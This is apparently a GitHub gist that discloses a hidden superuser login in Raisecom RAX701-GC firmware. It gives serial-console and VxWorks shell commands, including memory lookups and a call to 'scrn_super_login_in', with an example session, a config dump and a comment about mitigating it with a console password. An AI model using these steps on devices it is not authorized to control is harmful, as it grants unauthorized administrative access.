Skip to content

Instantly share code, notes, and snippets.

@Fluepke
Created July 13, 2026 21:18
Show Gist options
  • Select an option

  • Save Fluepke/744fe9b1548f858568d5cf51936c1515 to your computer and use it in GitHub Desktop.

Select an option

Save Fluepke/744fe9b1548f858568d5cf51936c1515 to your computer and use it in GitHub Desktop.
Versatel (1und1.net) Raisecom RAX700 / RAX701-GC: Superuser Backdoor via vxShell

If you're a Versatel customer and wondering what's going on inside the Raisecom RAX701-GC, here's a fun one.

Apparently, the firmware exposes a superuser login function that can be invoked directly from the VxWorks shell.

Steps

  1. Connect a serial console

    • USB-A to USB-A cable 🤪 (shows up as USB peripheral, as a serial adapter)
    • 9600 baud, 8N1
  2. Boot the device.

  3. Spawn the VxWorks shell:

    Ctrl+5, Ctrl+R, Ctrl+5
    
  4. Locate the current screen session:

    lkup "scrnSessions"
    

    Copy the reported address.

  5. Read the pointer stored there:

    d 0x<address>,4
    

    Copy the first value (the screen handle).

  6. Verify you've got the correct handle:

    scrn_print_logo(0x<handle>)
    

    It should print the Raisecom login banner.

  7. Invoke the hidden superuser login:

    scrn_super_login_in(0x<handle>)
    
  8. Set a new superuser password.

  9. Return to the vendor CLI:

    td _vxShell_
    
  10. Enjoy your shiny new superuser access.

Example

-> lkup "scrnSessions"
scrnSessions           0x02dc0ac8 bss

-> d 0x02dc0ac8,4
0x02dc0ac0:            05cd59d4 05ceb5c4

-> scrn_print_logo(0x05cd59d4)

-> scrn_super_login_in(0x05cd59d4)

Tested on a Raisecom RAX701-GC running RITP firmware.

raisecom#show running-config
System current configuration:
!command in view_mode
!
!command in config_mode first-step
create vlan 1-4094 active
ptp mode e2etransparent
link-state-tracking group 2
!
!command in aclmap_mode
!
!command in qos mapping mode
!
!command in wred mode
!
!command in enable_mode
enable encrypt-password <redacted (was base64, likely MD5 hash, non-default password)>
user name raisecom encrypt-password <redacted (same as above)> 15
!
!command in region_mode
!
!command in ip igmp profile mode
!
!command in service_mode
!
!command in mpls_bidirection_ingress_mode
!
!command in mpls_bidirection_transit_mode
!
!command in mpls_bidirection_egress_mode
!
!command in mpls_tunnelif_mode
!
!command in mpls_tunnel_policy_mode
!
!command in l2cp profile mode
l2cp-process profile 1
l2cp-process protocol dot1x action tunnel
l2cp-process protocol lacp action tunnel
l2cp-process protocol oam action tunnel
l2cp-process protocol cdp action tunnel
l2cp-process protocol vtp action tunnel
l2cp-process protocol pvst action tunnel
l2cp-process protocol lldp action tunnel
!
!command in aggregation_mode
!
!command in port_mode
!
interface nni 1
switchport trunk allowed vlan 1-4094
switchport mode trunk
switchport protect
oam disable
link-state-tracking group 2 downstream
mtu 9600
l2cp-process profile 1
!
interface nni 2
switchport trunk allowed vlan 1-4094
switchport mode trunk
switchport protect
oam disable
mtu 9600
l2cp-process profile 1
!
interface uni 1
switchport trunk allowed vlan 1-4094
switchport mode trunk
no switchport protect
oam disable
link-state-tracking group 2 upstream
mtu 9600
l2cp-process profile 1
!
!command in vlan configuration mode
!
!command in ip interface mode
!
!command in loopback interface mode
!
!command in traffic policer mode
!
!command in cmap_mode
!
!command in pmap_mode
!
!command in pmap_vlan_mode
!
!command in pmap_cos_mode
!
!command in bandwidth profile mode
!
!command in hcos_mode
!
!command in hvlan_mode
!
!command in mpls_expath_mode
!
!command in keychain_mode
!
!command in mlacp_mode
!
!command in tdm port mode
!
!command in iccp mode
!
!command in config_mode
!
!command in mpls_qos_mode
!
!command in clkmgmt_mode
!
!command in cespw mode
!
!command in stm1 port mode
!
!command in stm4 port mode
!
!command in mefpm mode
!
!command in rcsam mode
!
!command in mefservice_mode
sdp nni 1
!
!command in mefservice l2cp profile mode
!
!command in mefservice cos profile mode
!
!command in mefservice threshold profile mode
!
!command in mefservice flow profile mode
!
!command in mefservice bandwidth profile mode
!
!command in mefservice interface mode
!
!command in mefservice evc mode
!
raisecom#
@SaveEnergy

Copy link
Copy Markdown

@Fluepke is correct as any bypass to reach the VxWorks shell provides read and write access to the memory. This gives a lot of options to manipulate the device. Setting a console port password however provides a reliable way to mitigate the elevation to the CLI through scrn_super_login_in(0x<handle>) during my tests.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment